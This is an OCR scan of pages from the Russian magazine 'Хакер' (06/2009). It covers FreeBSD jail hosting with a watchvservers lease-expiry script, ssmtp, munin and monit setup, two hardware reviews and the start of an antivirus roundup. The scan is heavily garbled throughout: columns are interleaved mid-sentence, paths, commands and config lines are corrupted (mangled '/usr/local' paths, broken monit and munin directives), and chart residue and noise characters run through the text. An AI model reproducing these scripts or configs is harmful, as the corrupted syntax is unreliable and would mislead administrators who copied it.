О/ 70.00 69.92 70.00 70.00 О/ 70.00 69.87 70.00
8'Уа,г 70.00 69.92 70.00 70.00 .'y~г 70.00 69.00 69.9~
I!I Jtmp 0.00 QOO QOO QOO I!Iltmp 0.00 0.090.00
GЗ lusr 88.00 87.89 88.00 88.00 В /usr 88.00 97.82
88.00
E1lhome 99.00 99.00 99.04 100.00 IIIlhome 99.00 97.80 98.51

"
О Icdrom 100.00 100.00 100.00
_ _ _ _ _ _ _ _ _ _ _ _ ~stJJnd.at:e.:...МQD..Ь-';;).L..4-'l~2..20.Q
100.00 О Jcdrom 100.00 100.00 100.00
_ _ _ _ _ _ _ - J....< t..w>ll_~M~v 41I;'1!.'j"-;-jf"
Г-;'~':' ...... ~~ ,,_ I ~~ ~~ "_'. I ~, __ . ~ ~~~
I _ 1=! ...:~~1f'i;!1r;;;1
СМОТРИМ ГРАФИКИ MUNIN

.~~aJ!'.
drwxr-xr-x 7 root wheel 5126 4 май 12 19 ./ ..!. ~ ~~"~!<~.T~-:...~~~?~)~'~_'?~
drwxr-xr-x 20 root wheel 5126 19 апр 1149 .. / :.~~= ~Ш~ ~ ~""J.'nI
drwxr-xr-x 17 root wheel 5126 3 май 12 18 172.16.67.1/ :'~~:;~J~7д:~!9!~.:;:~r
-rw-r--r-- 1 root wheel 2,OG 3 май 12 20 172.16.67.1.image :~:~..r;;!~~:;~~l~;:"~w "~"~p, .. " .:. ."""... l~,~)t и ...
- rw- г-- г-- 17 root wheel ОВ 3 май 12 20 172.16.67.1.ipfw :.~O~~~~: ~OJ(I <о<>'.ож •• ~ • O:I'\O"'~, "'~ <>(:)·.... C>(n' ".,.~".o,o ~'PO...-.l

drwxr-xr-x 2 root wheel 5128 3 май 15 23 172.16.67.2/ ~ )!:1:~!~:~;~~~:~~~,~

-rw-r--r-- 1 root wheel 2,Ов 3 май 15 24 172.16.67.2.image :1o:{:~~;;JrJ~~~ ?"..;:;~~~0I1.-:.~.~~~:.~<" П~ ~~(ОО ..3...... W<>t-....:.,'~ ,j".• '00·.... "~...w'\ ~~)
- rw- г-- г-- 1 root wheel Ов 3 май 15 24 172.16.67.2.ipfw • f,p.ol~.~ ~. ""р .....,._ .."'С7';.....; 1Q.<IoO"9. J...-I.П. ,", "" •• ~.r,:ry1" ... ..
~~ CдP
drwxr-xr-x 17 root whee1 512в 4 май 13 43 172.16.67.3/ '*"d:I...1IM ...}'''''.... ooyd<ou1''.t)O
~~ 1~~~: g:~~~ ; ~ :::: ;~:::~
-rw-r--r-- 1 root wheel 5,OG 4 май 13 45 172.16.67.3.image .
~~ ~,,;;·rU1: ~f~ ~rтth=-~1tr,
- rw- г- -г-- 1 root wheel ОВ 4 май 13 45 172.16.67.3.ipfw tf "р" u
1t,pu'
~t (1y$t<R) > )11:'< ... /\оn
9·(..-·\t)~ZОХf~.\.r[
.1..',
drwxr-xr-x 17 root wheel 5128 4 май 13 50 172.16.67.4/
-rw-r--r-- 1 root wheel 5,OG 4 май 13 53 172.16.67.4.image
I
~
n""'.'!,Ч .. ~)"<op.~.o~....• ?~-:.м.c:O
.00.)01 _ ~'nJ rJ<~, о"", .."".......,. •
d'1ocI<4 •• " . " ,.. f • ..-ft"p..,,/d-w/1I.6'J12
'~1~ "'...
c.......
~~ ..
SJ •••Hl)<O

11 ,~." UI~qe ~ S(J'\ .I'\II~ 01.-,

-rw-r--r-- 1 root wheel Ов 4 май 13 53 172.16.67.4.ipfw 'СЛ~••• р.t«:nc'''I:<м:>C''I''''''О''''''''''\'oIJJI\4'

Р'''''''''' """,In........и ..-1о!! ~tdt"ll. /Y... fr..-..-'I........ l.... ""d1.pl<l

512в май
(MtI!
d rwxr-xr-x 2 root wheel 4 14 02 172.16.67.5/ ИНt ~O~_· ·1"sr/1.<Х..'/".цr<t.<I""
~IO" pr(lo~IIIII· 1..!r/lOH1/.t(;r(.4/....;"'~·~ .•~
.... ,~.1i'> 1toг:­
It/;l\>
-rw-r--r-- 1 root wheel 2,OG 4 май 14 05 172.16.67.5.image If , ..HtJ Р"'" .s.t~ оn,," "ИJrt
1f I"MtU't, ..1tMnf <:ycl.s th",.1 •• 0IIf
<1'1«(' 1""""'" иf>~ ...Н"р1«\1.л- .. r/run/.IoIЧ',р1d
-rw-r--r-- 1 root wheel Ов 4 май 14 05 172.16.67.5.ipfw
-rw-r--r-- 1 root wheel 288в 4 май 15 31 172.16.67.5.trouble n1~i~t:д~~i~~ч;~~;~~;?:~:~:;t
ЛИСТИНГ КАТАЛОГА/USR/JАIL ПОСЛЕ СОЗДАНИЯ ПРАВИМ MONIТRC
ПЯТИ СЕРВЕРОВ

€)

нео~еТСЯDсписке--отключитьего(устаНОDитьстатус сhес 1СГUnl1iпg ()

'disabIed') и начать бить TpeDoгy (отnращпъ письмо эдмину

И создать специальный файл $JAILDIR/$!P.trouble). # Покидаем фУНКЦИЮ, еслл сервер работает

УнасужееСТЪСКРШIТдлясron,которыйостанавливаети исправно

стгключаетвиpryaлъныесерверы, срок аренды которъrхиcreк. j1s I grep $IP && return

~ dvd Добавим нужную функциональностъ прямо в него. Ниже # Иначе пробуем его заnyстить

Полные версии кон­ приведен сокращенный вариантэтого скриrrrа; он содержит /usг/10са1/Ьiп/stагtvsелrег $IP > /tmp/
фигов >1 скриптов Ic базовый набордейсгвий, вьmолняемъrхнад каждым «актиВ' startvserver.out 2>&1
комментариямиl НbIM» сервером: sleep 15
ты найдешь на диске. # Заnyстипся? тогда ПОlCидаем функцию

# vi /usr/local/bin/watchvseгvers j ls I grep $IP && return

# Проверяем, заnyщен ли сервер # Нет'? Тогда отключаем его, генерируем файл

~120 ХАКЕР 06 /126/ 09

 _ _ - .. ~. - ._.

::-::- S'y'N/ACK

ери иБа9е Ьу
I . day Load average Ьу day

'l : 100

2.41
2.2
2.0
70
1.8
60
1.6
~ 50
1.4 !
40
30
1.21
1.01
20 0.8 '
10 0.6
О 0.4
Monl2:00 Tue 00;00
0.2
Cur: Min: Аvч. Мах:
[J syst:em 3.37 0.69 2.29 8.93 0.0
Моn 12:00 Tue 00:00
• int:ertupt 0.90 O.4i 0.98 L97
61 u~r 13.39 1..70 1L27 94.96 Cur: мin; Avg: Мё
[] nice: 0.98 0.47 0.66 L04 1ёId 428.иrn 0.00 293.22rn 2
l!Iid!e 81.37 0.00 84.90 96.23 Last update; Tue М ау S 11:05:03 ;
Last update:: Тие M~ 5 11;05:02 2009

MUNIN: ЗАГРУЖЕННОСТЬ ПРОЦЕССОРА И ОБЩАЯ НАГРУЗКА НА СИСТЕМУ

trouble и отправляем .Llиеьмо админу # make iпstаll replace clean

/usr/local/bin/disablevserver $IP
ер / tmp/startvserver. out $JAILDIR/$ {IP} . trouble Конфигурнруем:
cat $JAILDIR/${IP}.tro\lble I mail-s "watehvservers:
проблемы с сервером $IP" root #vi lus~cat/etc/ssmtp/ssmtp.conf
exit # Кому пересылатъ почту, направленную пользователю root
гооt=аШпiп@hоst.соm

~ Проверяем на истечение срока аренды # Адрес почтового сервера

check_est_t irne () mailh\lb=ail.host.com

rewritedomain=host.com
# Останавливаем и отключаем сервер, если его срок арен­ hostname~_HOSTNAМE_

ДЫ истек

i f [ $CURTIME -ge $ESTТIME ]; thел Добавляемв файл обратнъ~адресовзапись,указывающуюна адрес, с

/\lsr/loeal/bin/stop'fser'ver $IP которогобудутприходитъписьмаот moбогопроцесса,запущенногос
/usr/local/bi\ljdisa.blevserver $IP правамиroоt:

# Отправляем пиСЬМО админу и владельцу

cat $JAILDIR/${ IP} . expire I mail -Б "watchvservers: ~ echo root;system@'hostname' > /\lsr/local/etc/ssmtp/
истек срок аренды сервера $IP" root cat /usr/ revaliases
jai.Jbase/message_expire I mail -s .. www.host.com: срок
аренды вашего сервера истек" $ACМAIL Корневаясистематаюкенуждаетсяв ностоянномнаблюдении.Вот
fi несколькопараметров,которыетребуютвнимания:
• РаботоспособНОC'IЪкорневь~ сервисов;
• Нагрузка на сетевые ннтерфейсы;
ПропИJПем скриrrr в задания сгоп: • Нагрузка на CPU/мм;
• Нагрузка на диск;
#crontab-e • Свободноедисковое пространство;
МAILTO=root • Целостность.
*/20**** /\lsr/local/bin/watchvservers Мы разделим системунаблюдения за хост-системой на две независи­
мые части, нервая из KOТOP~ будет пронзводитъ МОlШТоринт ресурсов
Скриптбудетсл~тьзаработоспособностьювиртуальнь~серверови сервера и щцавать данные другой машине. Вторая будетследитъ за
докладываlЪоб истечениисрока арендыили uроблемахадминистрато­ сбоями и аномалиями и оповещать в случае необходимости системного
ру. В первом случае админполучитписьмостеМОЙ<<Watсhvsеrvе.гs:
про­ адмннистратора.

блемы с сервером < ТР>>> н выводом неудавшейся команды startvserver, Мониторmuпiп, основанный на клиент·серверноЙ архитектуре,

которыйтакже будетзanисанв файл $JAJLDIR/$IP.troubIe. Задача прост и удобен в установке и настройке. Мы воспользуемся нм для
адмпна в этом случае ­ ПОДКЛЮЧИ1ЪСЯ К кориевой машине, исправить решения первой задачи. для на чала установнм н оду muniп, которая
проблемуи вновь запустить виртуальныIй сервер. Во втором случае будет следить за нараметрами системы Н отдав ать накОIИенные
администратор получит сообщение <<Watchvservers: истек срок аренды данпые серверу:

сервера <IP>", нослечerооп можетлибо сразуудашrrьсервер командой

delvserver, либо дождаться продления аренды владельцем (на его адрес 11 cd /\lsr/port/sysu.tils/munin-node
тоже будет выслано специальноеnисъмо, содержимое которого берется # make install clean
из файла /usr/jailbase/message_expire). В обоихслучаяхсервер будет
переведен в состояниеdisabIed и остановлен. Создаемповый конфигурационныйфайл:
Команда mail подключаетсяклокальномупочтовомусерверудля от­
правки nисъма, поэтомупридется поднять Sendmail/Postfix или простой # cd /\lsr/local/etc/munin
релей на основе ssmtp: # ер m\lnin-node. conf. sarnple m\lnin-node. conf

# ed /usr/ports/гnail/ssmtp Открьmаемфайлтuпln-поdе.соnfндобавляемвпего/ще<.троки:

ХАКЕР 06 /126/ 09 .121

 » S··tN/ACK

~)Й)I flfa.~ !:I~CI'JIJ_m.I ~tCIfпIWjC 6:tФ!"", дю.о БIco61g Нt.!11lif! C!!p~1:iI

"i'IblnI-;,r- ._., .
.. И;J'/КI(.~" >11 e:)~", д,.a~ ........ 1>'се CТI2<=''''' <: p.lбnlC)СПОС(lе:~"'UN Cepв~,j"i'I

# vi /usr/local/etc.lmuninlmunin.conf
\fS.tl'lV'Ets,-'ur jvя·/j.l1Ь..::а::/db I ;Y€ f ' +4 ",cl."S·

fI "onyo.ае.. Ye")'IIUI'18 .ре .." • фоpv.tте rт.v.-чч_

C'JlHl"'f... ·~~pJ ...~~_.­ # имя клиента С установленным шuпin-поdе
.l\pOI{OJU'... f1O~co:ycep8ep'a
tt:rt' VSa.VEIt '" SV!'1R""'~'Sj еЮ [jail. host. сош]
ch«lL..runn1n!l '~~А~Я;

ch~ucces51·r:;"RV'i:i':.

# И его IP

..... c h -:о.:Lеst_'t1mеsvsЮl.'.......

# ГipQ.ep"e ... "nY~ 1'1" сер. ер аддгеББ 172.30.5.1.29

,
"I",k_runn'ln;j()
V5ERVi;~~1l usе_поdе_пamеуеБ
!I'·''!dк>SVS(II.VU;:I

~~~~iJS~~~:~ce;'8~
11' [г:~~~lllG~): tht:.n
с ..1.-.:1':' -tj'
":np..l.8HO p.6vHe'Т u
f1 Болъшеничеготрогатьне надо. Командаmuпiп-сгон,которуюсистема
~u~~i'i:C~~S;:~~;I!~e~i~p)/Т.lllр/~;"n:"Sегv~.OtJt. 1>&1
sl~l!p lS нортовзаботливовписалав заданиясгон, будетзапускатьсякаждыепять
" ЭаnYCnVX:JI? Tar,U fW... ~e>I '?Y""~

SH\IlIG-":~ I QГ~ Нр'

tf [ ..~~~н:.~']; "'~ минут, собиратьстатистикус нодчиненныхиод, генерироватьграфики

f1
" .. .,-т? 7,;,,'М ",,",,""'~I!" C'n:>. re"epl!W"w G.I."II trlNble u
IU5r/1tX"l/t11пJd's,;"Ь'~s~ег S!'"

(~ a .......... у""'I!" ....... .. иломещатьих в каталог/usrIlocal/www/munin. Чтобылросматрхшать

)AlLQH... ·I!<;;:h(. S~J"lI~ I СIЛ: .d ' : ' -1 2'

ер !ttlp!st.rt... sеrvет.ощ sз.ul.OIR/SIIР}.tгoublt

(.t.t I)A.H.. ()f:;/H1",}.troobl'! I .... 11 -5 -~·.tlсtNSI'''~f!j",, ~"".... <:" <:~.PI\" ПР" rOCIIO:

графики,ты можешьJШбо поДНJПЬWeb-сервериа этой машиие,либо

e.. 't простонабрать <Jile:// /usr/]ocal/www/munin/index.html"B адресной
• пра.~~""'''. ,:;::.-е.оу.1<1О" ..... О::;;>8е:!' no ~~h
;h.;с,·~:..<,,:з~О
строке6раузера.
СКРИПТWАТСНVSЕRVЕRS БозвращаемсянахостJ3иртуальныхсерверови пристулаем:к настройке
monit, простого иудобного демона, следящего запорядкомвнашей
системе.Демон шоnit будет нашим сторожевымпсом, которомумы

# vi /usr/loc.al/etc.lmunin/munin-node.c.onf ПРИ1<3Жем сигнализироватьобо всехнеприятныхситуациях, таких

iI имя хоста как чрезмерная загруженностьсистемы, заканчивающееСЯДИСКОlJое

host_name jаil.hоst.еош пространствоили падение сервисов.

# Адрес сервера, который будет собира'гь и отображать ста­ Устанавливаемrnопit:

ТИС'I'ИКУ

a110w Л172\.168\.0\.J.$" 11 сд /usr/ports/sysutils/monit

# make insta11 с1еап
Нода nJш:lln использует плагиныдля наблюдения за параметрами
системы. Плarинылежат в каталоге /usгllосаl;sharе/mш:lln/рlugins, но Идобавля:емв его конфиг:
реально используются тмько те:из них, CCbIJOOf на которые есть в ката­

логе /usгIlocal/еtс/mUlliп/рlugiпs.поэтомупереходимвэтот каталоги #у; /usr/tocal/etc.lmonitrc.

создаемссылки на нужныеIIЛагины: 11 Проверка общих параметров системы: loadavg, занятая

память, иаrрузка на процессор

11 сд plugins check system rnyhost .шуdоmаiп. i:1d

# Eor i in сри дЕ d.Cinode 1оад memory netstat. ореп_.сПеs iE loadavg (1min) > 4 then aleri:

\ if 10adavg (5min) > 2 then alert

swap vmstat; до 1п -s /usr/loca1/share/munin/ if шеmоry usage > 85% then а1ег!:

plugins/$i \ if сри usage (user) > 90% ttlen alert
$PWD/$i; допе iE сри usage (system) > 30% then alert
iE ери usage (wait) > 20% then a1ert
'Также добавим ССЫJПО{ на IIЛагиныiС иiСетгсоll~ которые предназначе­ # Про верка "замусоренности" файловой системы
ны для набmoденилза сетевыми интерфейсами (вьmолпи эти команды 11 adOs2 - это диск, смонтированный к /usr или к $JI\ILDIR
для всехсетевых интерфейсов): check device usrEs with path /dev/adOs2
if Брасе usage > 80% then alert

-s /usr /
отчет по трафику и сетевым подключениям1I 1п # Следим за работоспособностью демона sshd

10cal/share/rnunin/p1ugins/if_errco1_$PWD/iE_errc01_edO check ргосеББ sshd with pid.cile /var/run/sshd.pid

start program = "/etc/rc.d/sshd start"

Запускаемmпniп-node и прописываемего в /etc/ гс.соnfдля автомати­ stop program = "/etc/rc.d/sshd stop"
ческойзагрузки: iE Eailed port 22 protoco1 ssh then restart
if 5 restarts within 5 сус1еБ then timeout

11 /usr /local/et.c/munin-node. sh start

11 echo "munin_node_enable=\ "YES\" " » /etc/rc. сопЕ ПрописьшаемIlJOnitB / etc/rc.conf и запускаем:

На клиептской стороне все. Осталось на(:троить службу, которая будет # echo "monit_enabJe=\ "YES\ '" » /etc/rc.con.c
опрашивать ноды и генерировать графики. Поэтому идем на сервер 11 /usr/local/etc/rc.d/monit start
(кота рый может б),[ть той же машиной) и устанавливаем па нем mnnin­
шаiп: ГЕТЕРОГЕННОСТЬПятоепме базы Dиртуальныхсерверо))
зарезервированодля храненияверсииFrееБSD-окружения.С его по­

# сд /usr /ports/sysuti1 s/шuпiп-шаin мощьюмы убиваемсразудвухзЗЙцев.Во·первы.х,ВОЗМОЖНОСТЬвыбора

# шаkе install clean версииFrееБSD-сервераделаетнаш сервис6меелривлекательнымдля
клиеНТОВ,-некоторым
из них в с:илуопределенныхнричин
может по­

Открываемфайл rnиniп.соnf: надобитьсяконкретнаяревизилОС. Бо-вторых,методпря:могоуказания

версиипозволяетсохранитьдобруютысячунервпыхклетокво время 06·
# сд /usr / 10са1 /ete/munin новлениякорневойОСдо новойверсии. РазработчикиFгееБSDСllедуют
t· # ср шuпiп. сопЕ. Баmр1е munin. conf давнейтрадищrnсохранениясовместимостиспроШJIЬThlliядрами, так
что HOClle обновленилОС существующие окружеНJiЛ останутся НОЛНО­
И добавляемв него следующиестроки: стью работоспособными.

~122 ХАКЕР 06 /126/ 09

 >> s"r'NI дек

nfeO traffic Ьу day

100 k
"+
"~

.-
~

-
.~
о
50 k

"'tJ
J: -50 k
О
U
f1J
VI
...
f1J
-100 k
Q..
VI
.~ -150 k
..D

-200 k
Mon 12:00 Tue 00:00
Cur (-1+) Mi'"I (-1+) Avg (~/+) Мах (-1+)
bps 90.34kJ 62.96k 10.19k1 1.47k 90.65k1 48.79k 157.07k1 104.56k
Last update: Tue Мау 511;05:032009

Netstat - Ьу day MUNIN: ОТЧЕТ по ТРАФИКУ,и СЕТЕВЫМ

20
ПОДКЛЮЧЕНИЯМ
18

16

14
нами система находятсяна одной машине. На Web-сервереКРУТИТСЯ

~2 сайт сервиса, которыйпредоставляетклиентуВОЗМОЖНОСТЬсоздать

10
виртуальныйсервер. для этогоон должен заполнитьнесколькоформ,
8

где указатьДоменноеимя:,свой почтовыйадрес, срок аренды, тип

6

аккаунтаи т.д. Скрипт (можетбыть натlCанна РНР, Python, Perl) обра­

2 батыветT поля формы, формирует из них запРОС к скрипту addvserver и
O~.~~~W~~1..l~--.J~~~~~ вызываетего. Затем запускаетскриптstartvseTver, а клиенту возвра­
Мon ~2:OO 1«. 00:00
Cur: Min: Avg: Miillx: щает страничку с адресом его сервера и сгенерированным ключом ДJL'{
[) active 4.23 10.07m 2. 76 19.89
• pass~ Э.З9m Э_26m 4.75т 177.80m доступа по SSH. Когда срок аренды истечет, watc]lvservers автоматичес­
I!I failt!d 000 000 000 0.00
КИ остановит сервер и отправит клиентууведомление.
EJ resets 0.00 0.00 0.00 0.00
m estabIish.d .1.0'; 1.3.39m 609.69m 2.4(1
2. Маarrтабируемая система. Одна машина едва ли выдержитболее 15
виртуальных серверов, поэтому мыдошкны иметь возможность в любой
момент добавить новую машину в инфраструктуру. Масштабируемая:
в созданнойнами системесуществуеттолькоодип вариантокружения, система предполагает наличие центрального сервера, обслуживающего
версия которогосоответствуетверсии корневойос. В то же время Web-сервер, BIND, Sепdmail, сервер mwl.iп и отправляющего занросы на
FTeeBSD 7.1 способна исполнять код, скомпилированный для преды­ создание виртуальных серверов на другие машины. для ее реализации

дущихверсий системы, вплоть до 4.11. Поэтому, если ВОЗННЮiеттакая необходимо лишь предусгановитьна КДЖДУЮ машину нашусистему
необходимость, просто скачай один из предыдущихрелизов, установи управленилвиртуальными серверами, muпin-поdе, nl.iпit.И ssmtp, а на цен­
его на соседннй раздел н скопируй Dновый базовьгй DнртуаnьныЙдиск. тральный сервер добавитьнебольшую оберткудля addvserver. Она будет
Срез нужной версиидерева портов можно получить спомощью cvsup: сверюъся со специальным CJJИском машин, обслуживающихвиртуальные

сервера, выбирать нз нихту, на которой крутится наименьшее количество

#vi -/ports-supflle
серверов, подключа'1ЪСЯ кнейпо SSH и вьmолнять команду addvserver·.
*deEalllt host=CVSLlp2. ru. FreeBSD.org
Послечеro-снова открывать список иувеличнвать число виртуальных
*defalllt base=/var/db
серверовдляэтоймаши.нына едиющу(плюсоберткадляdеlvsеrvет).
*defalllt prefix=/usr/jailbase
3. Правильная маспrrабируемаясистема. Второй вариант неплох,
*deEault release=cvs tag=RELENG_5_4
но нредполагаетхранение базы серверов /пsг/jаilЬаsе/dЬна каж­
*deEalllt delete lIse-геl-suffiх
дой машине. Это усложняетобслуживаниеи затрудняетмиграцню
*default comp:::ess виртуальныхсерверов междухостами.Правильнаямасштабируемая
ports-all
системадоюкнаиспользовать единую базу данных с интерфейсом SQL
#- CYSclp --/ports-supfi le
вместо файла d Ь. в эгом случае база данных хранится на центральном
#- my /ilsг/jаilЬаsе/{РОГ;;S,рогt;s-б .4-RELEASE}
сервере, а с!срипты управлення виртуащ,ными серверами НОДЮIюча­

ются к ней вместо обращения J(ЛОКальноР,ry фаЙлуdЬ. Реализация этой

ЧТО ДАЛ ЬШ Е? Нашасистемауправленияи ноддержкивирту­ идеи потребуег значительной модификации скриптов управления и
альныхсерверовполностьюготова к использованию,но как применить добавления дополнительной колонки «IP машины, на которой крутится
ее В03можностидлясозданияполноценногосервиса?Есть три вариапта: виртуальный сервер" к базе данных, чтобы скрипт мог найти виртуаль­
I.ВсенаодноЙмarпине. В этом случае BIND, Web-сервери созданная ные сервера, принадлежащие только его машине.I

ХАКЕР 06/126/09 ~ 123

 '\
'1
, -,
:;t7 NATHAN BINKERT
J NATГcl5VNACK.RU I
Технические характеристики
Depo 5torage NA51005
>ЖесткиеДИСI<И:
До 5 жестких дисков SATA2 объемом до 1 Тб
каждый
• Сетевая система хранения данных Storage NAS
1005 ar I(ОМПанииОеро Computers предназначе·
на для иеподьзования в качеcrве сетеIЮГО фай­
лового ресурса для небольших рабоЧИJ{ групп.
Гибкая система настройки, использование на­
дежного и высокопроизвоДительного ипих в
качестве программной начинки, возможность
ДОС'l)'Па к информации из любой популярной
операционной систеМЫ, поддержка функции
принт-сервера, ПрИЕ.лекательныЙ внешний вид
и невысокаяцепаделаЮТЭТОТПРОДУКТОlJIИЧНЫМ
решением тогда, когда возникает необходи­
мость в надежном централизованном хранении
информации.
1· Система поддерживает все популярные конфи­
I"УРации RAID (О, 1,5, б, 10, иJВОD)
тью горячей замены, резервирования и роумин­
~124
>Функции RAID:
RAIO 0,1.5,6,1 О, и JBOO, поддержка I-1УЛЬТИ­
RAID [пользователь может создать несколько
RAID-маСОIВОВ на одной системеl, автомати­
ческое восстановление, «горяча,,» заl-1ена,
гадисков, расширения RAIDимиграцииуровней
RAID. Замена дисков не потребует вмешательс­
тваадминистратора, система сделает всю работу
повосстанОВJIениюисинхронизациивавтомати­
ческом режиме. Поддерживаетед ВОЗМОЖIюстъ
создания нескольких RAID-массивов на одной
системе. На передней нанели расположено IL'IТЬ
отсеков для жестких дисков SATA и один порт
eSATA сзади, что позволяет создать хранилище
данныхобъемом6Тб (врежимеJВОD).
Получить доступ к файл-серверу можно из опе­
рационных систем Windows, иnих, BSD, Мас 05
Х илилюбойдругой, поддеРЖIшающейпротоко­
лы CIF5/SMB, AFP З (Apple Filing Protocol), NFS
vЗ, FТP и mтp/нтгps. Устройство оснащено
с возможнос­ встроенным четырехпортовым Еthегпеt-комму­
татором, что упрощает работы по наладке сети.
«горячее» резервирование, роумингдисков.
миграция уровней RAID, расширение RAID
> Интерфейсные порты:
1 порт eSATA для расширения емкости
3 порта USB тип А (режим хостаl
1 порт USB тип В [режим клиента]
1 порт iSCSI/WAN
4 порта Glgablt Еlhегпеt коммутатора
> Особенности:
LСD-дисплей для начальной конфигурации
и отображения статуса системы
Управление через русифицированный web­
интерфейс
Уведомленияо событиях по e-mail или на LCD
3вуковоеуведомление О событиях
Поддерживается функция принт~сервера
!подключение принтера через USB]
Предустановлена ОС на базе Linux
> Питание·
Систеf~а хранения данных стандартно комп­
лектуется блоком питания с автоматическим
выбором частоты (50/60 Гц] и автоматическим
выбором входного напряжения [110/220 81
> Исполнение:
Tower (возможен монтаж в стойку]. размеры
!дхвхш. м 1-11 230х230х190
Масса до 5 кг
Кромедоcryпа через.локальную сеть, устройство
позволяет подключить себяв качестве iSCSI -ДИС­
ка или через USB-интерфеЙс.
для настройки можно использовать простой
русифицированный web-интерфейс или же
несколько ЮЮПОК и J,СD-экран (в экстренном
случае), на котором также отображается теку­
щее СОСТОJJние п данные оноследних собьгги­
ях. Предусмотрены и другие способы получе­
ния уведомлений: по е-таil и через 31~уковой
сигнал.
Гарантийное обслуживание осуществляется в
течение двух или трех лет, а цена составляет от
40417 (с двумя жесткими дисками на 500 Гб)
до 68126 рублей в конфигурациис шпью дис­
ками на 1 Тб каждый и трехгодичным сроком
гарантии.
XA~EP 06 '126' О?
---~

р links
Модельный ряд сер­

ееров iRU Rock:

. '" ,,. ~ , ~, - l.,....w t. I:'-:"::;~ .~:,' . : ---~:~::;.
WWW.iгu.ГU
с Ir
r:) ! , r;' I !.­
ргоduсtl.9Лi.lli: со гр_с

ТехничеекиехарактеристикиlВМ > Сетевой интерфейс:

SуstеmХЗ250 М2:
2 адаптера Intel Glgablt Ethernet Ilntel р j,nfo
> Процессор:
82563ЕВ] В программно-аппа­

Intel Соге 2 Duo Е8400 Iдвухъядерныйi [3.0

ратном RAID-KOHT­
ГГЦ, 1333 МГц FSB, 6 Мб L2J
> Устройство чтения и записи носителей: роллере выполнение

Привод OVD+!-RW логичеСКО~1 операции

> Память:
XOR дЛЯ обеспечения

2 Гб [2*1 024 Мб] РС2-5300 [667 МГц] ЕСС

> Питание: функционирования

DDR2. максимальный объем 8 Гб с 4 слота

Блок питания 350W массива RAIO 5 берет
на себя специальная

> Жесткие ДИСКИ:

> Расширение: микросхема, есе ос­

Два по 250 Гб 5АТА2. с ЭОЗМОЖНОСТЬЮ «горя­

1 слот PCI Express х8 тальное по-прежнему

чей замены"
«курирует" цe~T­

> Внешние порты ввода-вывода: ральный процессор.

> Поддержка RAID:

~ разъема USB 2.0 [2 спереди. 2 сзади) осуществляющий

Интегрированный 5АТА2 RАID-контроллер

2 последовательных порта IDВ-9МI операции с помощью

IntellCH9R IRAIO 0.1.5.1 О], поддерживаю­

Разъемы PS!2 для подключения мыши и драйверов.

щий до 6 жестких дисков

клавиатуры

• в начаае года компаЮ!Я "НКА-Групп», произво­

дитель и поставщик компыоеровB под ТОРГОJ30Й
RA1D-масси:вов уровней О,
вышенаЗВaJIНОМУ
1, 5
контра!lЛеру,
и 10.
сервер
Благодаря
подде­
lарантиянасервер составляет три года с возмож­
ностью сервисного обслуживаЮ!Я и консульта­
маркой iRU, объявипа о начме l1роизводства ржнвает интерфейс eSATA с возможноCIЪЮ го­ ЦИЙ на месте или в любом нз фирменных сервнс,
серверов начального и среднего уровня iRU рячей замены дисков и технологию MatrixRAID, яых центров, расположенных по всей России.
Rock Одним из нихявляется 1U-сервер iRU Rock котораяпозволяет использовать разные режимы Сервер имеет все необходимые сертификаты и
s101 U, ориентированный яа решение широкого RA1D на одном наборе дисков (ИСПОЛЬЭОDaJIие прошел специмьную программу тесrирования.

спектра задач, связанных с поддержкой сетеJ30Й своей частидискадля каждого режнма). Пока Rock s101U дороговат, D сравнении с
ияфраструктуры небольших КОМПaJIИЙ иrш от­ Сервер вьmолнен В форм-факторе lЦ что деаает аналогичными решениями других произво­

делов. Сервер одинаково хорошо справится как его идеальным решением для быстрараcryщих дителей, поэтому iRU придется приложить
со ('Тандартным набором сетевых служб (DНСР, компаний, сетевая ннфраt'Труктура которых но с­ немало усилий, чтобы составить достойяую
DNS, контроллер домена Active Direetory), так и TOiIННO развивается. Объем оперативной памяти конкуренцию уже укрепившимся на рынке

со среднезагруженнымweb- и прокси-сервисом. варьируется от одного до восьми гигабайт DDR2­ серверов игрокам (в первую очередь, это
В недрахсервера скрьгшроцессор Inte! Core 2 Dио 800 (4 cJIoтa). На задней ПaJIели расположено 2 lВM и НР). Но сам факт появления нового
Е8400 и 11рограммно-аппаратный SATA2 МID­ портасетевогоадаrrrераIntel GigabitEthemet(Intel отечественного производителя на поле, где

КОНТРО!lЛер InteI ICH9R, который поддерживает 82563ЕВ). В комплект входит DVD+ /-RW н два господствуют зарубежные компании, не мо­
до б SAТА2-дисков С ВОЗМОЖНОCIЪюорганизации жеcn<иxдиска SAТА20бъемом250Гб каждый. жет не радовать.

ХДКЕР 06/1261 09 ~125

 »
SYN/ACI<:
I
I I
I
.'
:
-

СЕРГЕЙ «GRINDER" ЯРЕМЧУК

I
~
,
I GRINDER@SYNACK.RU , I

Последний
I
.'

;!
бастион
I Обзор 'комплексных средств защиты корпоративного уровня
,.
Сегодня, чтобы противостоять возникающим интернет-угрозам,
на каждом клиентском компьютере должно быть установлено комплексное
,.
решение, совмещающее в себе антивирус с мощным эвристическим моду-
I,i
лем, файрвол, сканеры электронной почты и веб-трафика, а также средс-

тва проверки на наличие руткитов. Представленный обзор средств защиты

корпоративного уровня поможет выбрать наиболее подходящий продукт

-'­

I •'"
со
ЕSЕТNОDЗ2SМАRТSЕСU~ТУ
BUSINESS ЕDПIОN
Антивирус
(WF) и взаимодействует с Цен'гром безонас-

ностиWiпdоws. БР3lщмауэробеrnечивает
тов . В сети может функционировать любое
количество EP,AS (лицензия не определяет
4:
"­ NOD32 хорошо известен обычному пользо- CIшнирование сетевых соедииеиий на каналь- их количеСТЕО) С ВОЗМО)(GIOСТЬЮ реw!Икации
,.z:
00 вателю благодаря высокой с!{орости работы ном уровне, умеет распознавать и блокировать данных на центральный сервер. Это позволя-
И просrоте Е ИСПОЛЬЗ0вании. КорпораТИЕНая многие типы сетевых а так, а также работать ет унростить администрирование в сетях со

Еерсия NOD32 Smart Security Вusiпеss Еditiоп с адресамиIPvб и создаDатьдля нихправила. сложной, разветвленнойтопологией.Кроме
(SMBE) нацелена на защиту нетолько рабочих Кроме тото, он способен кон'гролировать изме- того, администратор может дополнительно

стаЕЩИЙ Windows 2000 /ХР /Visra, но и файло- нения в исполняемIi!Xфайлах, предотвращая развернутьлюбое количество серверов-зеркал
ЕыхсерЕеров на wraтформахWiнdоws, Nove]J ихзараженне. Проверка НТТР и РОР3 'графика обновлений,ЧтобыклиеНТПОЯВИЛСЯDКОН-
I Netware и Linux/~BSD/Solaris. Обеспечивается позволитулучшитьзащитукомпьютераот соли, следуетразрешитьудаленноеадминис-

,. возможность удаленного управления всеми
